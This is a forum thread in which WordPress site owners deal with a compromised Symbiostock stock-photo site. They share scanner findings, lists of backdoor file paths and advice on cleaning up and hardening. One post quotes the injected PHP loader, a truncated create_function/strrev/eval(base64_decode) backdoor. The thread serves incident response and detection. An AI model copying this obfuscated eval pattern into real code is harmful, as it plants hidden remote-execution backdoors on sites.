MicrostockGroup
Microstock Photography Forum - General => Symbiostock => Symbiostock - Technical Support => Topic started by: LesPalenik on March 15, 2015, 12:29
-
I haven't checked nor updated my Symbio site for a while, and when I finally did, I found a "viagra" link displayed between the stock site name and image title.
Linked to the following URL: www.xxxpowersconstruction.net/viagra-prices-cvs (http://www.xxxpowersconstruction.net/viagra-prices-cvs) (inserted xxx into the name, not to reward this scumbag)
After running Wordfence analysis, that utility reported a number of malicious php files in the wp-content directory.
Critical Problems:
* File appears to be malicious: wp-content/themes/advantica/functions.php
* File appears to be malicious: wp-content/themes/clean-theme-2-0-1-old/functions.php
* File appears to be malicious: wp-content/themes/clean-theme-2-0-1-old2/functions.php
* File appears to be malicious: wp-content/themes/smallbiz/functions.php
* File appears to be malicious: wp-content/themes/symbiostock/functions.php
* File appears to be malicious: wp-content/themes/symbiostock-dragonfly/functions.php
* File appears to be malicious: wp-content/themes/symbiostock-old/functions.php
* File appears to be malicious: wp-content/themes/symbiostock-old2/functions.php
* File appears to be malicious: wp-content/themes/twentyeleven/functions.php
and a few other themes
This is the data found in the php files (I shortened the code disguised as some gibberish shown in bold from about 80 lines to 1 line only - to eliminate any possibility of spreading this virus further):
<?php
$wp_user_functions_init = create_function('$a',strrev(';)a$(lave'));
$wp_user_functions_init(strrev(';))"=oQD9pQD7kiIwhGcf52bpR3YuVnZft2YhJGbsF2YigCdyFGdz9lYvlgCNsXKpcCdyFGdz9lYvdCKzR3cphZoYWa"(edoced_46esab(lave'));
?>
Not knowing much about php code, I deleted ALL the lines in the php files, and that got rid of the offending link, but I wonder if I should have some information in those php files. If symbiostock/functions.php should contain some essential information, please, let me know what it should be.
I also wonder how my site got hacked. If my php files got infected through some plugin/theme, by direct attack to my Symbiosite or laterally on my host site.
-
Verify your site with home copy using program like Beyound Compare (backup your site, and compare locally). Replace damaged files. And finally - set minimum permissions for files and folders, just to allow the site to function. Change passwords, including to database (for this don't forget to change permissions to min after you change passwords). On WP site you will find recommendations and which permissions to set and where.
How it could be done? Many ways, old version of WP, permissions, plugin holes, hosting company problems. To restore quickly keep always ready healthy copy of your site.
-
I hope your getting commissions on that viagara!
Wordfence does a pretty good scan. There's lots of ways the site can get hacked, but a reinstall of WP should help. Being up to date should help too. Change your password, and that should cover it.
-
I updated Symbiostock theme and all plugins, changed the password, the disturbing message is gone, let's hope it will stay so.
Last week, I received a note from my host provider about security vulnerability regarding the WordPress SEO by Yoast plugin (allegebly discovered and patched - but maybe too late for me), so that could have been the culprit.
http://thehackernews.com/2015/03/wordpress-seo-by-yoast-plugin.html (http://thehackernews.com/2015/03/wordpress-seo-by-yoast-plugin.html)
-
UPDATE:
Wordfence (free version) detected the infected php files in Themes only.
However, my host provider (ipower.com) ran subsequently the Sitelock utility that found two types of backdoor code in the following files:
evvy_colby.php: SiteLock-PHP-UPLOADER-1-bt in the home directory
and then JCDEF.Obfus.CreateFunc.BackDoorEval-21. in the following files
/wp-admin/theme-install_new.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/user/menu_infoold.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/maint/repair_ver1.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/network/edit_indesit.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/js/common.min_bck_old.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/css/colors/_mixins_new.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/css/colors/light/colors_infoold.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/css/colors/blue/colors-rtl.min_noversion.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/css/colors/coffee/colors-rtl.min_prevv1.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/includes/export_bck_old.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
Looking at the site stats, I saw over 500 hits at the login.php in the last two weeks (I didn't log in at all), but I doubt that they cracked the password (I changed it anyway).
If this infection happened indeed through Yoast SEO, there is a good chance that my site was not the only one compromised Symbiostock site.
You might want to check your site also for the above files (plus the functions.php in Themes).
-
Also, the Revolution Slider had a hack that affected tens of thousands of sites. Not sure if SY uses the Revolution Slider plugin though. Really, the hack could have come from anywhere...any theme or plugins, including the symbiostock ones. Yoast is the most recent, but I get alerts almost daily from Sucuri or Wordfence about hacks into themes or plugins.
-
I just got some more information from ipower.
They don't think the hack came from Yoast or within their network, but possibly from a script hack in another plugin or through FTP. I doubt that it came from my computer, since I haven't accessed my Symbiostock site for a long time.
The lesson is not to rely just on the Wordfence, but run also Sitelock or some other similar tools, or check manually in the previously mentioned directories for suspicious back door php files.